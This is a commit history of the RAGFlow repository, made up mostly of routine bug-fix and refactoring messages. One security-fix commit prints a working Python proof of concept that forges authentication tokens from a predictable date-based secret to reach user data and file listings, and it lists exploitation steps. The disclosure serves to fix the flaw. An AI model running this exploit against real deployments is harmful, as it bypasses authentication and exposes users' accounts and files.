ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-12-07 04:21:30 +00:00

Author	SHA1	Message	Date
Jin Hai	4a2ff633e0	Fix typo in code (#8327 ) ### What problem does this PR solve? Fix typo in code ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-06-18 09:41:09 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Liu An	64e281b398	Fix: Add validation for empty filenames in document_app.py (#8321 ) ### What problem does this PR solve? - Add validation for empty filenames in document_app.py and trim whitespace ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-17 15:53:41 +08:00
Liu An	a3bebeb599	Fix: Enforce 255-byte filename limit (#8290 ) ### What problem does this PR solve? - Add filename length validation (<=255 bytes) for document upload/rename in both HTTP and SDK APIs - Update error messages for consistency - Fix comparison operator in SDK from '>=' to '>' for filename length check ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-16 16:39:41 +08:00
Yongteng Lei	0fa1a1469e	Fix: avoid mixing different embedding models in document parsing (#8260 ) ### What problem does this PR solve? Fix mixing different embedding models in document parsing. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-16 13:40:12 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Yongteng Lei	b2eed8fed1	Fix: incorrect progress updating (#8253 ) ### What problem does this PR solve? Progress is only updated if it's valid and not regressive. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-13 17:24:14 +08:00
Liu An	99725444f1	Fix: desc parameter parsing (#8229 ) ### What problem does this PR solve? - Fix boolean parsing for 'desc' parameter in kb_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:47 +08:00
Stephen Hu	1ab0f52832	Fix: The OpenAI-Compatible Agent API returns an incorrect message (#8177 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8175 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:15 +08:00
Kevin Hu	d36c8d18b1	Refa: make exception more clear. (#8224 ) ### What problem does this PR solve? #8156 ### Type of change - [x] Refactoring	2025-06-12 17:53:59 +08:00
Liu An	7fbbc9650d	Fix: Move pagerank field from create to update dataset API (#8217 ) ### What problem does this PR solve? - Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq - Add pagerank update logic in dataset update endpoint - Update API documentation to reflect changes - Modify related test cases and SDK references #8208 This change makes pagerank a mutable property that can only be set after dataset creation, and only when using elasticsearch as the doc engine. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:49 +08:00
Liu An	d0c5ff04a6	Fix: Add pagerank validation for non-elasticsearch doc engines (#8215 ) ### What problem does this PR solve? Validate that pagerank updates are only allowed when using elasticsearch as the document engine. Return an error if pagerank is set while using a different doc engine, preventing potential inconsistencies in document scoring. #8208 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:22 +08:00
Liu An	cef587abc2	Fix: Add validation for dataset name in KB update API (#8194 ) ### What problem does this PR solve? Validate dataset name in knowledge base update endpoint to ensure: - Name is a non-empty string - Name length doesn't exceed DATASET_NAME_LIMIT - Whitespace is trimmed before processing Prevents invalid dataset names from being saved and provides clear error messages. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 11:37:25 +08:00
Liu An	60c1bf5a19	Fix: duplicate knowledgebase name validation logic (#8199 ) ### What problem does this PR solve? Change the condition from checking for >1 to >=1 when validating duplicate knowledgebase names to properly catch all duplicates. This ensures no two knowledgebases can have the same name for a tenant. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 09:46:57 +08:00
Liu An	e87ad8126c	Fix: Improve dataset name validation in KB app (#8188 ) ### What problem does this PR solve? - Trim whitespace before checking for empty dataset names - Change length check from >= to > DATASET_NAME_LIMIT for consistency ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-11 16:14:29 +08:00
Stephen Hu	e6f68e1ccf	Fix: When listing KBs, the total is sometimes wrong (#8151 ) ### What problem does this PR solve? In the kb.app list method, the total is calculated incorrectly when owner_ids is given (the total is now calculated from the paged result). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 11:34:30 +08:00
yurhett	9c6c6c51e0	Fix: use jwks_uri from OIDC metadata for JWKS client (#8136 )
### What problem does this PR solve?
Issue: #8051
The current implementation assumes JWKS endpoints follow the standard `/.well-known/jwks.json` convention. This breaks authentication for OIDC providers that use non-standard JWKS paths, resulting in 404 errors during token validation.
Root Cause Analysis
- The OpenID Connect specification doesn't mandate a fixed path for JWKS endpoints
- Some identity providers (like certain Keycloak configurations) use custom endpoints
- Our previous approach constructed JWKS URLs by convention rather than discovery
### Solution Approach
Instead of constructing JWKS URLs by appending to the issuer URI, we now:
1. Properly leverage the `jwks_uri` from the OIDC discovery metadata
2. Honor the identity provider's actual configured endpoint
```python
# Before (fragile approach)
jwks_url = f"{self.issuer}/.well-known/jwks.json"
# After (standards-compliant)
jwks_cli = jwt.PyJWKClient(self.jwks_uri)  # Use discovered endpoint
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:58 +08:00
Liu An	968ffc7ef3	Refa: dataset operations to simplify error handling (#8132 ) ### What problem does this PR solve? - Consolidate database operations within single try-except blocks in the methods ### Type of change - [x] Refactoring	2025-06-09 13:29:56 +08:00
Liu An	92625e1ca9	Fix: document typo in test (#8091 ) ### What problem does this PR solve? fix document typo in test ### Type of change - [x] Typo	2025-06-05 19:03:46 +08:00
Stephen Hu	6953ae89c4	Fix: when stream=false, new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in an assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 )
### Description
There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls.
### Source - Sink Analysis
Source (User Input): HTTP Authorization header containing attacker-controlled JWT token
Flow Path:
1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142)
2. Token Processing: JWT token extracted from Authorization header
3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123)
4. Database Query: `UserService.query()` called with decoded empty access_token
5. Sink: Authentication succeeds, returning first user with empty access_token
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys


def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")

    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing"),
    ]
    auth_headers = {"Authorization": malicious_token}

    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f" Email: {user_data.get('email')}")
                    print(f" User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f" Files found: {len(files)}")
            else:
                print("Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()


if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```
Exploitation Steps:
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any credentials
Version: 0.19.0
@KevinHuSh @asiroliu @cike8899
Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
Stephen Hu	f819378fb0	Update api_utils.py (#8069 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486 lazy throw exception to better support custom embedding model ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:05:58 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
Kevin Hu	b6f1cd7809	Fix: no kb selected for an assistant. (#8021 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 17:42:16 +08:00
Liu An	e64da8b2aa	Fix: sdk can not update chat model (#8016 ) ### What problem does this PR solve? #7791 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:22:26 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
CharlesHsu	241fdf266a	Fix: Prevent Flask hot reload from hanging due to early thread startup (#7966 ) Fix: Prevent Flask hot reload from hanging due to early thread startup ### What problem does this PR solve? When running the Flask server with `use_reloader=True` (enabled during debug mode), modifying a Python source file would trigger a reload detection (`Detected change in ...`), but the application would hang instead of restarting cleanly. This was caused by the `update_progress` background thread being started too early, often within the main module scope. This issue was reported in [#7498](https://github.com/infiniflow/ragflow/issues/7498). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --- Summary of changes: - Wrapped `update_progress` launch in a `threading.Timer` with delay to avoid premature thread execution. - Marked thread as `daemon=True` to avoid blocking process exit. - Added `WERKZEUG_RUN_MAIN` environment check to ensure background threads only run in the reloader child process (the actual Flask app). - Retained original behavior in production mode (`debug=False`). --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-30 13:38:30 +08:00
Stephen Hu	62611809e0	Fix: Add user_id when create Conversation (#7960 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7940 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 13:11:41 +08:00
dong	62de535ac8	Fix Bug: When performing the dify_retrieval, the metadata of the document was empty. (#7968 ) ### What problem does this PR solve? When performing the dify_retrieval, the metadata of the document was empty. ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:58:05 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 The underlying cause is that a change in the selected row keys triggers a retrieval test, though the reason for this is unknown. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
天海蒼灆	f584f5c3d0	agents openai API add new way to get session_id (#7937 ) ### What problem does this PR solve? SpringAI can only add session_id in metadata, so add a new way to get session_id from "id" or "metadata.id" ![image](https://github.com/user-attachments/assets/0c698ebb-2228-46d8-94c5-2a291b6f70bf) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 13:31:17 +08:00
Yongteng Lei	0c562f0a9f	Refa: change citation mark as [ID:n] (#7923 ) ### What problem does this PR solve? Change citation mark as [ID:n], it's easier for LLMs to follow the instruction :) #7904 ### Type of change - [x] Refactoring	2025-05-29 10:03:51 +08:00
Yongteng Lei	b95747be4c	Fix: early return when update doc in sdk (#7907 ) ### What problem does this PR solve? Fix early return when update doc. #7886 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-28 19:20:27 +08:00
sinopec	243ed4bc35	Feat: Support dynamically add knowledge bases for retrieval while u… (#7915 ) …sing the SDK chat API ### What problem does this PR solve? When using the SDK for chat, you can include the IDs of additional knowledge bases you want to use in the request. This way, you don’t need to repeatedly create new assistants to support various combinations of knowledge bases. This is especially useful when there are many knowledge bases with different content. If users clearly know which knowledge base contains the information they need and select accordingly, the recall accuracy will be greatly improved. Users only need to add an extra field, a kb_ids array, in the HTTP request. The content of this field can be determined by the client fetching the list of knowledge bases and letting the user select from it. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Li Ye <liye@unittec.com>	2025-05-28 19:16:16 +08:00
Qidi Cao	4d835b7303	fix: resolve “has no attribute 'max_length'” error in keyword_extraction (#7903 ) ### What problem does this PR solve? Issue Description: When using the `/api/retrieval` endpoint with a POST request and setting the `keyword` parameter to `true`, the system invokes the `model_instance` method from `TenantLLMService` to create a `chat_mdl` instance. Subsequently, it calls the `keyword_extraction` method to extract keywords. However, within the `keyword_extraction` method, the `chat` function of the LLM attempts to access the `chat_mdl.max_length` attribute to validate input length. This results in the following error: ``` AttributeError: 'SILICONFLOWChat' object has no attribute 'max_length' ``` Proposed Solution: Upon reviewing other parts of the codebase where `chat_mdl` instances are created, it appears that utilizing `LLMBundle` for instantiation is more appropriate. `LLMBundle` includes the `max_length` attribute, which should resolve the encountered error. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-05-28 10:58:06 +08:00
liu an	ff0e82988f	Fix: patch regex vulnerability in filename handling (#7887 ) ### What problem does this PR solve? [Regular Expression Injection leading to Denial of Service (ReDoS)](https://github.com/infiniflow/ragflow/security/advisories/GHSA-wqq6-x8g9-f7mh) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-27 16:35:37 +08:00
Kevin Hu	1f32e6e4f4	Fix: list out of boundary (#7843 ) ### What problem does this PR solve? Close #7837 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-26 10:28:36 +08:00
Hao Zhang	2f4d803db1	Delete Corresponding Minio Bucket When Deleting a Knowledge Base (#7841 ) ### What problem does this PR solve? Delete Corresponding Minio Bucket When Deleting a Knowledge Base [issue #4113 ](https://github.com/infiniflow/ragflow/issues/4113) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality)	2025-05-26 10:02:51 +08:00
Yongteng Lei	453287b06b	Feat: more robust fallbacks for citations (#7801 ) ### What problem does this PR solve? Add more robust fallbacks for citations ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality)	2025-05-23 18:24:55 +08:00
liu an	e166f132b3	Feat: change default models (#7777 ) ### What problem does this PR solve? Change default models to built-in models https://github.com/infiniflow/ragflow/issues/7774 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-23 18:21:25 +08:00
Yongteng Lei	42f4d4dbc8	Fix: wrong type hint (#7738 ) ### What problem does this PR solve? Wrong hint type. #7729. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-23 18:21:06 +08:00
liu an	fed1221302	Refa: HTTP API list datasets / test cases / docs (#7720 ) ### What problem does this PR solve? This PR introduces Pydantic-based validation for the list datasets HTTP API, improving code clarity and robustness. Key changes include: Pydantic Validation, Error Handling, Test Updates, Documentation Updates ### Type of change - [x] Documentation Update - [x] Refactoring	2025-05-20 09:58:26 +08:00
Chaoxi Weng	6ed81d6774	Feat: Add OAuth `state` parameter for CSRF protection (#7709 ) ### What problem does this PR solve? Add OAuth `state` parameter for CSRF protection: - Updated `get_authorization_url()` to accept an optional state parameter - Generated a unique state value during OAuth login and stored in session - Verified state parameter in callback to ensure request legitimacy This PR follows OAuth 2.0 security best practices by ensuring that the authorization request originates from the same user who initiated the flow. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-20 09:40:31 +08:00
donblack01	115850945e	Fix: When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data (#7325 ) ### What problem does this PR solve? Fix: When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data' Fix: Fixed the issue where the new knowledge base would not be renamed when there was a knowledge base with the same name ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: tangyu <1@1.com> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-20 09:39:26 +08:00
Yongteng Lei	e8e2a95165	Refa: more fallbacks for bad citation format (#7710 ) ### What problem does this PR solve? More fallbacks for bad citation format ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] Refactoring	2025-05-19 19:34:05 +08:00
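
Several of the commits listed above (a3bebeb599, 64e281b398, 0a13d79b94) describe the same filename rules: trim whitespace, reject empty names, and reject names longer than 255 bytes using `>` rather than `>=`. The sketch below shows one way those rules could fit together. Only the `FILE_NAME_LEN_LIMIT` name comes from the commit messages; the function name, the UTF-8 encoding, and the error texts are assumptions made for illustration, not RAGFlow's actual code.

```python
# Hypothetical sketch: only FILE_NAME_LEN_LIMIT is named in the commit messages;
# validate_filename, the UTF-8 encoding, and the error texts are illustrative.
FILE_NAME_LEN_LIMIT = 255  # bytes


def validate_filename(name: str) -> str:
    """Return the trimmed name, or raise ValueError if it is empty or too long."""
    name = name.strip()
    if not name:
        raise ValueError("File name can't be empty.")
    # Measure encoded bytes, not characters: multi-byte names reach the limit sooner.
    # Use ">" so that a name of exactly FILE_NAME_LEN_LIMIT bytes is still accepted.
    if len(name.encode("utf-8")) > FILE_NAME_LEN_LIMIT:
        raise ValueError(f"File name must be {FILE_NAME_LEN_LIMIT} bytes or less.")
    return name
```

Keeping the limit in one constant means the check and the error message cannot drift apart, which is the point of the refactoring in 0a13d79b94.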


869 Commits
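
The 'data_api' to 'dat' symptom described in commit 115850945e matches what Python's `str.rstrip` does when it is used to drop a suffix: its argument is treated as a set of characters, not as a substring. Whether that was the exact cause in RAGFlow is an assumption here; the snippet only demonstrates the general pitfall and one safer alternative.

```python
module_name = "data_api"  # example module name taken from the commit message

# str.rstrip treats its argument as a set of characters, so the trailing
# "a" of "data" is stripped along with "_api".
stripped = module_name.rstrip("_api")

# str.removesuffix (Python 3.9+) removes only the exact trailing substring.
fixed = module_name.removesuffix("_api")

print(stripped, fixed)
```

On Python versions older than 3.9, slicing after an `endswith` check gives the same result as `removesuffix`.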